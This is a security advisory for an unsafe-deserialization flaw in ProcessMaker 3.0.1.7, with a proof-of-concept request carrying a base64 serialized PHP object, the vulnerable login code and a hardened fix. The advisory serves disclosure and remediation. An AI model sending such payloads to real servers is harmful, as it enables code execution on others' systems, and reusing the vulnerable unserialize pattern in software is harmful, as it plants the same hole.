### Summary
A code execution vulnerability exists in ProcessMaker Enterprise Core 3.0.1.7-community. A specially crafted web request can cause unsafe deserialization, potentially resulting in PHP code being executed. An attacker can send a crafted web parameter to trigger this vulnerability.
### Tested Versions
ProcessMaker Enterprise Core 3.0.1.7-community
### Product URLs
https://www.processmaker.com/community-2
### CVSSv3 Score
8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
### CWE
CWE-502 - Deserialization of Untrusted Data
### Details
It was discovered that the application deserialized untrusted data without properly limiting or validating the incoming data type.
The following Proof of Concept request demonstrates the issue:
```http
GET /sysworkflow/en/neoclassic/login/sysLoginVerify.php?d=TzoxNToiTXlTUUxDb25uZWN0aW9uIjoyOntzOjY6IgAqAGRzbiI7TjtzOjg6IgAqAGZsYWdzIjtpOjA7fQ== HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.56.101/sysworkflow/en/neoclassic/login/login?u=%2Fsysworkflow%2Fen%2Fneoclassic%2Fadmin%2FpmLogo
Connection: close
```
The following code was found to be responsible for unsafe deserialization:
```php
if (array_key_exists("d", $_GET)) {
    // Untrusted input: the "d" query parameter is base64-decoded and handed
    // straight to unserialize(), so any serializable class loaded by the
    // application can be instantiated by the request.
    $_POST = unserialize(base64_decode($_GET["d"]));
}

if (! isset ($_POST)) {
    G::header('location: /sys/' . $lang . '/' . SYS_SKIN . '/' . 'login/login');
}
if (isset($_SESSION['sysLogin'])) {
    $_POST['form'] = $_SESSION['sysLogin'];
}

require_once 'authentication.php';
```
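As an added example, not ProcessMaker's own code, the following is a hardened replacement for the block above. It assumes PHP 7.0 or later (for the `allowed_classes` option of `unserialize()`) and uses a hypothetical helper name, `decode_login_form_param`.

```php
<?php
// Added example (not ProcessMaker code): a hardened replacement for
// `$_POST = unserialize(base64_decode($_GET["d"]))`.
// Assumes PHP >= 7.0 so that unserialize() accepts 'allowed_classes'.

/**
 * Decode the "d" parameter into a flat array of string values.
 * Returns null for anything that is not exactly that shape.
 */
function decode_login_form_param(string $encoded): ?array
{
    // Strict base64: reject characters outside the alphabet instead of skipping them.
    $raw = base64_decode($encoded, true);
    if ($raw === false) {
        return null;
    }
    // Never instantiate classes from untrusted data. With allowed_classes => false
    // any "O:" object payload becomes __PHP_Incomplete_Class, so no __wakeup()
    // or __destruct() of an application class runs during deserialization.
    $decoded = @unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($decoded)) {
        return null;
    }
    $clean = [];
    foreach ($decoded as $key => $value) {
        // A login form only submits string keys with scalar values;
        // nested arrays or (incomplete) objects are rejected outright.
        if (!is_string($key) || !is_scalar($value)) {
            return null;
        }
        $clean[$key] = (string) $value;
    }
    return $clean;
}

// Caller side: refuse the request when "d" is present but malformed,
// rather than silently continuing with a half-populated $_POST.
if (array_key_exists('d', $_GET)) {
    $form = decode_login_form_param((string) $_GET['d']);
    if ($form === null) {
        http_response_code(400);
        exit('Invalid login form data');
    }
    $_POST = $form;
}
```

Where the producer of the `d` parameter can also be changed, encoding the form as JSON and using `json_decode($raw, true)` removes `unserialize()` from the request path entirely, which is preferable because the PHP unserializer itself has a history of memory-safety bugs on malformed input.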
### Mitigation
Restrict access to known, trusted users and hosts.
### Timeline
* 2016-04-28 - Vendor Disclosure
* 2017-07-19 - Public Release
### CREDIT
* Discovered by Jerzy Kramarz of Portcullis Computer Security Limited.